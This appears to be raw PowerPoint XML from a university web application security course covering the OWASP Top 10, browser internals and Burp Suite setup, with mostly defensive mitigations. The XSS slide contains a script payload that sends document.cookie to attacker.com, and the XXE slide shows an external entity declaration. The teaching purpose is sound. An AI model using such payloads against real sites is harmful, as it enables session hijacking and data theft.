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75"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="300" r:id="rId7"/>
    <p:sldId id="573" r:id="rId8"/>
    <p:sldId id="574" r:id="rId9"/>
    <p:sldId id="575" r:id="rId10"/>
    <p:sldId id="310" r:id="rId11"/>
    <p:sldId id="335" r:id="rId12"/>
    <p:sldId id="633" r:id="rId13"/>
    <p:sldId id="339" r:id="rId14"/>
    <p:sldId id="307" r:id="rId15"/>
    <p:sldId id="312" r:id="rId16"/>
    <p:sldId id="314" r:id="rId17"/>
    <p:sldId id="311" r:id="rId18"/>
    <p:sldId id="316" r:id="rId19"/>
    <p:sldId id="317" r:id="rId20"/>
    <p:sldId id="313" r:id="rId21"/>
    <p:sldId id="318" r:id="rId22"/>
    <p:sldId id="319" r:id="rId23"/>
    <p:sldId id="342" r:id="rId24"/>
    <p:sldId id="321" r:id="rId25"/>
    <p:sldId id="343" r:id="rId26"/>
    <p:sldId id="323" r:id="rId27"/>
    <p:sldId id="324" r:id="rId28"/>
    <p:sldId id="325" r:id="rId29"/>
    <p:sldId id="326" r:id="rId30"/>
    <p:sldId id="327" r:id="rId31"/>
    <p:sldId id="345" r:id="rId32"/>
    <p:sldId id="328" r:id="rId33"/>
    <p:sldId id="329" r:id="rId34"/>
    <p:sldId id="330" r:id="rId35"/>
    <p:sldId id="334" r:id="rId36"/>
    <p:sldId id="347" r:id="rId37"/>
    <p:sldId id="331" r:id="rId38"/>
    <p:sldId id="333" r:id="rId39"/>
    <p:sldId id="341" r:id="rId40"/>
    <p:sldId id="654" r:id="rId41"/>
    <p:sldId id="655" r:id="rId42"/>
    <p:sldId id="656" r:id="rId43"/>
    <p:sldId id="599" r:id="rId44"/>
    <p:sldId id="617" r:id="rId45"/>
    <p:sldId id="618" r:id="rId46"/>
    <p:sldId id="600" r:id="rId47"/>
    <p:sldId id="601" r:id="rId48"/>
    <p:sldId id="602" r:id="rId49"/>
    <p:sldId id="603" r:id="rId50"/>
    <p:sldId id="604" r:id="rId51"/>
    <p:sldId id="605" r:id="rId52"/>
    <p:sldId id="606" r:id="rId53"/>
    <p:sldId id="607" r:id="rId54"/>
    <p:sldId id="608" r:id="rId55"/>
    <p:sldId id="609" r:id="rId56"/>
    <p:sldId id="610" r:id="rId57"/>
    <p:sldId id="611" r:id="rId58"/>
    <p:sldId id="612" r:id="rId59"/>
    <p:sldId id="619" r:id="rId60"/>
    <p:sldId id="613" r:id="rId61"/>
    <p:sldId id="614" r:id="rId62"/>
    <p:sldId id="615" r:id="rId63"/>
    <p:sldId id="620" r:id="rId64"/>
    <p:sldId id="621" r:id="rId65"/>
    <p:sldId id="622" r:id="rId66"/>
    <p:sldId id="629" r:id="rId67"/>
    <p:sldId id="623" r:id="rId68"/>
    <p:sldId id="624" r:id="rId69"/>
    <p:sldId id="626" r:id="rId70"/>
    <p:sldId id="627" r:id="rId71"/>
    <p:sldId id="657" r:id="rId72"/>
    <p:sldId id="616" r:id="rId73"/>
    <p:sldId id="30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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Complexity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lack of understanding of frameworks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dealing with unfamiliar components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need to interface with users, data sources,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6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7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7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4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2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7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D part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4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 injection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7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Marriott breach – 4 years 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7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4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20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66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2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reason for the presentation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79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this is the reason for the presentation name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04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9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don’t like the OWASP description of untrusted data being injected – the problem is that it is trusted, in error.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62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48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once found sheet music in a exposed directory on a site offering files for sale.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sample page was located in the same directory!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6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3CAE-4813-254D-94D6-5E5F3CC953C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980D5-DABE-B448-AC0C-6060E7EFDD4F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79EB-0F69-C244-A58C-CF740CD1A6B7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7A3C-1C34-9043-9710-4195DFD3EA38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C4D2-F181-9D4E-A931-E21EAE6AF508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83A5-CBB9-6348-BF5F-EA432F189993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B14C-C43A-3A4E-B3D9-CA6585EE9088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CAEF-CEAA-F04F-B409-B6D2E3C624DE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1B4B-DE3E-1C4D-A9D6-4CDA7332F3B4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371B-41C2-9A41-8AEF-5EFA9FA4B571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4883-1882-6641-8BC5-3E9CB9C73005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4620AA-7C15-8745-98E7-A57867F0FA8C}" type="datetime1">
              <a:rPr lang="en-US" smtClean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5211.001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1sec702fall20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op10.uwaterloooo.ca/calendar?eventid=263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ndex.php/Philadelphi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eetup.com/OWASP-Philadelphi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wasp.org/www-project-top-ten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aligarsiel.com/Projects/howbrowserswork1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3hpAeoZ4ek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download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websecuritydojo/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/SecurityShepherd/releas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Top_10-2017_Top_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10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en-US" sz="2200" dirty="0"/>
              <a:t>Site: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://community.mis.temple.edu/mis5211sec702fall2020/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty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reconnaissance and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Google Chrome</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tamper Chrome</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Postman and Postman Interceptor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Developer Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mozilla Firefox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tamper Data for FF Quantum</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Developer Tools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AD9DD-6593-1444-A43D-4C668EC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D43EE-3DD3-074D-9A64-C51F0304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9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854777"/>
            <a:ext cx="8677297" cy="36316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Unvalidated input, which contains malicious content, is accepted by the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many different types of injection attacks, including</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Commands which can be executed in the victim’s browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Database commands that can access or alter data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OS commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Submits operating system commands that run on the web application server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4BB98-307C-DF4C-BD11-1FD9A9C7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6B68F-43DE-2843-8A08-7B40E8D4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Validate data on server; don’t rely on client-side validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whitelist input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use appropriate APIs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540AC-E988-8649-98FA-5FD23C2D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A2B85-DED8-894B-9516-EB21257F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Broken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Harvested lists of usernames and passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Weak passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No defense against automated attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Passwords stored unsafely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Insecure password recovery methods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3369A-03DF-2C48-8E67-0205C597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1945F-DD7B-8845-B402-3E8E1E67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Authentication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Multi-factor authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UW is rolling out Duo keys, which use either a hardware fob or your mobile phone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t allow weak passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limit failed login attempts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use session IDs securely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0807E-4FB6-6746-9BAF-9C294C6DC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74A3-37F8-0448-965F-7CB62547C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Sensitive Data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Data transmitted in cleartext</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data stored in cleartext</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data accessible via network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use of old, weak encryption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BFA1F-4803-2A45-AFC3-27FF1203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101BB-BDC6-C642-A0AD-2C2BD959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Sensitive Data Exposure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Encryption of data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In transit, over the network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At rest, in database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoid storing unneeded data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t store unrelated data in application web space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77656-01B6-9442-858F-5069DFD8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E4EF-E5CB-3A46-8480-61B6363A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XML External Entities (XXE)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XML documents can include references to URIs, which are resolved when processed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can exfiltrate files, or cause denial-of-service attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SYSTEM "file:///dev/random" &gt;]&gt;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A04BA-C63C-5649-B5C6-B833B8BF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96E9F-2D3A-D540-B105-2E71010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XML External Entities (XXE)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Use newest versions of XML processors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable external entity processing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Validate uploaded XML content before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8F7E9-9A5A-EF40-9E3D-FB3D059C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D03A1-0245-6241-A14F-F28137FD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Broken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App can be accessed without authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Users can access data belonging to others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://top10.uwaterloooo.ca/calendar?eventid=2634</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Users can switch identities by modifying URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Users can access privileged web pages by modifying URL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1FB86-B323-2840-AF86-9BD5E538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8D7A8-3176-3B45-B3E9-D8D345E7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Security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41323-4FB4-124C-A8E3-446B64E2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EFA9D-124F-1B49-8732-94CBA0CB7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Broken Access Control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Deny access to resources by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access controls specific to user and group rather than simply allowing logged-in users equal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FD5E2-CD55-314A-96C6-610CFC1E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A414-0122-9240-B9F1-E6F98358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Security Misconfiguration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Pages, ports, services not secured against unauthenticated access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g. directory listings allowed in app, which lets attackers scan for files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unnecessary features enabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Error messages provide details about app infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g. versions of libraries used might be displayed in an error message, which would allow attacker to search for known vulnerabilities in those libraries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DB038-EE68-6345-81A5-F964CF39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6FE79-0557-2A42-9DD2-55C91BA5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Misconfiguration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Servers and environments should be hardened via automated processed to ensure no step is left out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remove unneeded features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09531-6332-1D4D-8A8B-90F21437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68F8A-1980-994C-AD60-EB271028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Cross-Site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Malicious scripts are executed in victim’s browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provided through tainted URLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web page has links with embedded scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(String) page += "&lt;input name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>creditcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' type='TEXT’ value='" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’&gt;(‘&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>='http://www.attacker.com/cgi-bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cookie.cgi?foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>='+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/script&gt;’)+ "'&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stored on server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inserted during fake user registration, misuse of comment mechanism, etc.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F7104-5E0E-0748-A708-9AA3270B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5F875-543D-3941-A94B-549B286E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Cross-Site Scripting (XSS)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Prevent input of script elements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g. angle brackets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whitelist input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use frameworks that sanitize input automatically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0307F-6AF4-0B4A-8B41-602E92DF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E8B83-5CBE-DD49-993C-177A368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Insecure Deserialization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Data objects may be converted into a format suitable for storage or transmission, in a process called serialization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The process of restoring the converted data to a format suitable for use by an app is called deserialization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data can be crafted so that upon deserialization, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>it ???</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, a serialized user record may be edited to assign additional rights to an individual.  If that record is deserialized into an app, the user could obtain enhanced privileges.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1E05-4CE2-A847-BF08-F8DB62D7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0EAF-C601-7147-B8F4-0A194691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Insecure Deserialization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Don’t accept objects from untrusted sources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement integrity checks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B444A-9A27-D04B-B4EB-A2407912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605E6-5DAA-BE4C-A273-A181740C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Using Components with Known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Servers with older software components that contain known vulnerabilities are at risk of compromise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FA21D-15F7-A844-9F54-109B5ECB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3F186-E7D7-0841-A0AE-78C349F6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 Using Components with Known Vulnerabilities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Unpatched libraries are a hacker’s best friend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0154F-1AE8-0344-A8F0-9D1DFBA4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EB5D2-34AD-8645-822D-72C63AC8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1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Components with Known Vulnerabilities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software components of the application and the underlying operating system must be kept up to date.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability reports for installed software need to be reviewed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software patches and upgrades must be done in a timely fashion.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software should only be upgraded from official sources.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E6AA2-B3EF-2744-9D15-0C4C8D8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75997-D4A6-7C42-8075-DCA3766A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hard can web programming be?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A7EA9A6-66D4-46B3-B57D-5CFC634D55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20578" y="2202773"/>
            <a:ext cx="7884869" cy="24524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FEFE5-1AD3-F44B-8979-04E04A04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67FF-03CE-EE49-9053-09CB9DFC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 Insufficient Logging &amp;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Unusual events are not logged</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logged events are not reviewed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Either allows suspicious behavior to go undetected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414715-9234-F947-BBED-3148A390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6D9C-2A13-DC4A-96A6-CC533B0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Insufficient Logging &amp; Monitoring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Log events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Login failures, high rates of access, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logs must have sufficient detail and context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Store logs in safe location off the web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logs must be collated and reviewed for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4B306-B0E7-394C-B244-26A1D59F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67FF3-A0E9-0B47-9B5A-9938D193A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Former Top 10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Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unvalidated Redirects and Forwards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9B335-E2CF-3C46-A42B-0EB5235E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7F406-A01B-F847-AD1F-E1B3172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chapters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Local groups that sponsor events and speakers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Foster collaboration among developers and security staff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Philadelphia</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.meetup.com/OWASP-Philadelphia/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty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06543-50C8-244B-85C5-9D14C5C8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10ACE-7D14-F24B-BDB2-ED08B0CF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The OWASP Foundation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.owasp.org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https://owasp.org/www-project-top-ten/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F845B-021A-864E-A3FA-5200C1F0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9E676-561E-6349-9759-A5013AE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Cheat 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Over 60 to date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cover a broad number of security issues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103EF-1C56-2349-AAFF-8F3BF987A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3DB3F-4561-0547-874C-23782B66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Cheat sheets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ED0DC3-296F-4C2B-893E-5FD1A94F4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97" y="1916906"/>
            <a:ext cx="3211806" cy="344328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3971A-0C1B-BC40-8CCC-523A170C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C2718-4AB7-214A-9C8B-5AA7EDAB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Web Browser?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rendering Engine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript Engine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network communications layer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May also include</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add-Ins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser Helper Objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>APIs to/for other applications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9561D-504A-0049-BD1B-5DB3C7A8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9580F-BD42-524F-B6EB-2B22DD8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3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More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are we talking about this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser are fairly complicated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browsers have many sub-components and features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browsers need to understand many different forms of character encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All of this gives us something to work with when attacking Web Applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Good reference for details</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://taligarsiel.com/Projects/howbrowserswork1.htm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2F54E-E983-164C-8EA7-12F27DA5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0537E-1D25-7D43-9811-79F5DE2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9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all of this is interesting, but does that have to do with penetration testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or, to put it another way.  How de we exploit these issues?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First step: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Intercepting Proxies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9EA71-92AA-6441-B045-128DA65C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E693F-E0C1-6248-A38A-F1830C4B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9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(and nearly only) Rule</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="13716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Never Trust User Input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4C806-3D13-D546-928B-04443EBC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57107-CA53-8E49-903C-6176A63B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1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Intercepting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Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webscarab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Paros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0D69F-51EF-504B-A19B-904FC04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9424A-7DFE-CE42-BDDE-88BFACBA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Rules for Our Use of Intercepting Proxies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course</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitor and record ONLY UNLESS YOU ARE ON A TEST SITE YOU OWN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not inject or alter any traffic unless you personally own the web site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We’ll save changing traffic in the next course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9346C-982F-CF4C-AAD7-7A99D6F9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F7EC3-ECEC-C04D-BFA3-7318F6E2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60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Burp Suite by logging in to Kali and selecting Burp Suite from:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kali Linux&gt;Web Applications&gt;Web Application Proxies&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>burpsuite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those interested in a video, here is a link to a YouTube video I found useful:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=G3hpAeoZ4ek</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are many others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66ACA-6033-CA40-9849-82132455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CF5F2-9AAD-0D49-B3EA-BDCAA133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7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A2041-5909-D941-8B67-3F4F3A5A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14188-462B-B643-9DDD-F5DFBAFE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burpsuite is running, you will need to start and configure a browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kali’s web browser is “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Iceweasel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”, an adaptation of Firefox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After starting Iceweasel, navigate to preferences</a:t>
            </a:r>
          </a:p>
